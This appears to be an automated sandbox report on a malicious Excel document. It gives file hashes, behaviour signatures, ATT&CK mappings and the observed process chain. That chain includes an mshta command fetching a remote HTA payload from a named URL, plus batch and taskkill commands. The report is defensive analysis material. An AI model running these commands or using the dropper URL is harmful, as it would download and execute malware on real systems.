Analysis

  • max time kernel
    152s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17149.13096.xls

  • Size

    38KB

  • MD5

    533a8fcd1f64d3ea05629945f9700ac3

  • SHA1

    e5ae13e4e8d5dd211fcabfd3f1e56c0840591235

  • SHA256

    7992c0f6155900ff20b80177a0570a5414ba65927a43edaf42aa6cfe126ed030

  • SHA512

    9a47144a7f56a0d3eff175488502db7643df9cad59e47b1871fda29342e7c09c0fc39b132d8e6a154a16614d6abe3b1966a54c7b05bda7b41e9306a0d070732f

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://facextrade.com.br/wp-includes/certificates/4.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 36 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17149.13096.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3912
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4792
      • C:\Windows\system32\PING.EXE
        ping -n 8 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:3356
      • C:\Windows\system32\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2860
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5048
      • C:\Windows\system32\mshta.exe
        mshta http://facextrade.com.br/wp-includes/certificates/4.txt
        3⤵
        • Blocklisted process makes network request
        PID:3368

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Outlook.bat
    Filesize

    1KB

    MD5

    20484f4a7d41c5f54a0dc7a7d35c2155

    SHA1

    0b197c48d648bbdc131dca6d4fb89903303372f9

    SHA256

    6df10dd726cef49360df78c47651a311ea7bb21064fe77e019e223ef32776072

    SHA512

    94df430c3890d5ba23618283ea6eaa6aa0c74d19c5e049f3cc4d65a464266ccc2eefccdb59d6464606200b2e51cdc9b57c2534c67aded228d00a54d856c98591

  • memory/2860-142-0x0000000000000000-mapping.dmp
  • memory/3356-140-0x0000000000000000-mapping.dmp
  • memory/3368-144-0x0000000000000000-mapping.dmp
  • memory/3912-147-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-137-0x00007FFF18990000-0x00007FFF189A0000-memory.dmp
    Filesize

    64KB

  • memory/3912-138-0x00007FFF18990000-0x00007FFF189A0000-memory.dmp
    Filesize

    64KB

  • memory/3912-135-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-134-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-133-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-132-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-136-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-148-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-149-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/3912-150-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp
    Filesize

    64KB

  • memory/4792-139-0x0000000000000000-mapping.dmp
  • memory/5048-143-0x0000000000000000-mapping.dmp